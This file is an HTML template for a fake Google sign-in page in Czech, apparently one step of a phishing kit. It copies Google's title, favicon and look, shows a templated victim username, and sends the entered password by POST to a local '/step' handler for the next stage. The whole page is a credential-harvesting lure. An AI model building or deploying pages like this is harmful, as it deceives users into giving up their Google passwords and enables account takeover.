<html>
  <head>
    <title>Google</title>
    <link rel=icon href="https://www.google.com/favicon.ico">
    <link rel="stylesheet" type="text/css" href="/static/styles/google.css">
    <style>
      {{ adictional_style | safe }}
    </style>
    <script>
      function input_in(){
        var btn = document.getElementById("placeholder");
        btn.style.display = "none";
        var box = document.getElementById("box_input");
        box.style.border =  "2px solid #1a73e8";
      }
      </script>
      <script>
      function input_out(){
        var btn = document.getElementById("placeholder");
        btn.style.display = "none";
        var box = document.getElementById("box_input");
        box.style.border =  "1px solid #dadce0";
      }
      </script>
      <script>
      function next() {
        var username = document.getElementById("input_password").value;
        if (username.length < 8) {
          document.getElementById("input_password").value = "";
          var box = document.getElementById("box_input");
          box.style.border =  "1px solid #db0d29";
          console.log("first_if");
        } else {
          document.getElementById("loading").style.display = "block";
          document.getElementById("box_input-form").submit();
          console.log("second_if");
          document.getElementById("next_button").onclick = null;
        }
        console.log("none");
      }
    </script>
  </head>
  <body>
    <div class="box_main">
      <div style="display: none;" id="loading" class="loading">
        <div></div>
      </div>
      <img src="/static/img/download.png">
      <h2>Váš účet</h2>
      <div class="user_info">
        <img src="/static/img/user_profile_logo.jpg">
        <div>{{username}}</div>
      </div>
      <h2 style="font-size: 14px; text-align: left;">Chcete-li pokračovat, nejprve ověřte svou identitu</h2>
      <div id="box_input" class="box_input">
        <form id="box_input-form" style="margin: 0; width: 100%;" method="POST" action="/step">
          <input id="input_password" type="password" name="password" onclick="input_in()" onblur="input_out()"></input>
          <input type="hidden" name="step_number" value="2">
        </form>
        <div id="placeholder">Zadejte heslo</div>
      </div>
      <div class="box_forgot-password">
        <h1>Zapomněli jste heslo?<h1>
      </div>
      <div class="buttons">
        <a href="https://accounts.google.com/signup">Vytvořit účet</a>
        <div id="next_button" onclick="next();"><p>Další</p></div>
      </div>
    </div>
  </body>
</html>
